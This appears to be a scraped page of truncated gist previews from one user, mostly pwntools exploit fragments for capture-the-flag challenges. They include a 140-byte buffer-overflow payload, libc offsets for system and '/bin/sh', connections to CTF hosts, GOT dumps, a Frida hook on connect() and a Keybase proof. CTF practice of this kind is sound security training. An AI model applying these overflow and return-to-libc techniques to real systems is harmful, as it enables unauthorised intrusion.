sudhackar

from pwn import *
import numpy as np
import sys


'''
0x00019ad3 <+243>:	mov    DWORD PTR [esp],eax
0x00019ad6 <+246>:	call   0x32f50 <exit>

p system

sudhackar

from pwn import *
local=len(sys.argv)==1
'''
0804b00c  00000107 R_386_JUMP_SLOT   00000000   printf
0804b010  00000207 R_386_JUMP_SLOT   00000000   memcpy
0804b014  00000307 R_386_JUMP_SLOT   00000000   __stack_chk_fail
0804b018  00000407 R_386_JUMP_SLOT   00000000   fread
0804b01c  00000507 R_386_JUMP_SLOT   00000000   puts
0804b020  00000607 R_386_JUMP_SLOT   00000000   __gmon_start__
0804b024  00000707 R_386_JUMP_SLOT   00000000   exit

sudhackar

Keybase proof

I hereby claim:

• I am sudhackar on github.
• I am sudhackar (https://keybase.io/sudhackar) on keybase.
• I have a public key whose fingerprint is 285B 7686 8970 789A B6D2 EAFF E6DB 7072 7521 A3FB

To claim this, I am signing this object:

sudhackar

from pwn import *

s = remote('127.0.0.1',5000)
s.recvuntil('command:')
s.sendline('2')
s.recvuntil('overwrite?')
s.sendline('2')
s.recvuntil('tweet:')
s.sendline('A'*140+p32(0x804918c))
s.recvuntil('command:')

sudhackar

from pwn import *

offset___libc_start_main = 0x0000000000020740
offset_system = 0x0000000000045390
offset_dup2 = 0x00000000000f6d90
offset_read = 0x00000000000f6670
offset_write = 0x00000000000f66d0
offset_str_bin_sh = 0x18c177

bss = 0x00000000000130b8

sudhackar

game = """
.....1...1
1......0..
..0....0..
.00...0..1
1........1
...0..1...
0....1....
.......0.0
0........0

sudhackar

from pwn import *
context(arch='amd64', os='linux', log_level='info')

system_main_arena_offset = 0x37f7e8
got_strlen = 0x603040
s = remote("pwn.rhme.riscure.com",1337)

def recv_menu():
    s.recvuntil(": ")

sudhackar

dword_6661C0 = [1649885203,594050925,1581470779,-1391327847,-1611275700,-1912869808,-599971129,495688880,1480676927,-2013402532,-909651928,1320857042,210015150,-1192689802,-1425012835,-232312589,-1239741301,-1142292876,-1036574509,-1996951722,-198888713,-450216471,1280137767,8427430,-1995564639,-1761340491,731483796,1029862777,1380405299,2024325110,627735913,1179343915,-700764981,1404151492,1721939426,1016365966,-86589174,1705227488,-1290268787,-1495075486,92509344,-1091895950,-2046092117,695105889,1985694731,865175172,-549704763,966230152,543784559,-1108607888,1683309079,1220063190,1464095541,681086870,-1511787424,-2146885969,242443355,-153959166,58824356,-1861873231,-1661672626,-1762466494,41377875,-1595869338,1413829175,-1978722141,580815258,-433373973,159879336,311335354,125068117,1246713891,-1138947449,344759230,1078550063,2086488583,996177789,-607527372,2007874300,462003892,444557379,1153215454,377187403,765168784,-382846495,1621145574,-48089607,1203612380,2125118962,1103079640,1968852233,-751292467,564

sudhackar

'use strict';

var connect = new NativeFunction(
	Module.findExportByName(null, "connect"),
	'int',
	['int', 'pointer', 'int']
);

Interceptor.replace(connect, new NativeCallback(function (sockfd, addr, addrlen) {
	console.log(sockfd, addr, addrlen);

sudhackar

from pwn import *
context(log_level='info')
s = remote('crypto.chal.csaw.io',1578)

def send_blob(s, data):
    s.recvuntil(': ')
    s.sendline(data)
    print "sent", data
    return